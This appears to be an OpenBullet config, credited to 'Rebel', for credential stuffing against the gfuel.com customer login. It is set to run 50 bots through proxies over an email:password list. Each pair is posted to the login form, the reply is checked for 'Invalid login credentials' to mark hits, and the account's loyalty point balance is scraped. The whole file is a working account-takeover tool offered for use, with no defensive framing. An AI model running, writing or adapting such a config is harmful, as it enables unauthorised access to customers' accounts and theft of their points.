[SETTINGS]
{
  "Name": "Gfuel",
  "SuggestedBots": 50,
  "LastModified": "2018-05-22T01:52:31.7060184+00:00",
  "AdditionalInfo": "Does not capture anything, if you have any gfuel account with points on them, pm me and I might be able to add capture",
  "Author": "Rebel",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://gfuel.com/account/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://gfuel.com" 
  HEADER "origin: https://gfuel.com" 
REQUEST POST " https://gfuel.com/account/login" AutoRedirect=TRUE 
  CONTENT "form_type=customer_login&utf8=%E2%9C%93&customer%5Bemail%5D=<USER>&customer%5Bpassword%5D=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://gfuel.com/account/login" 
  HEADER "origin: https://gfuel.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Invalid login credentials" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Invalid login credentials" 
PARSE "<SOURCE>" LR "<span class=\"swell-point-balance\">" "<" Recursive=FALSE -> CAP "Points" "" "" 
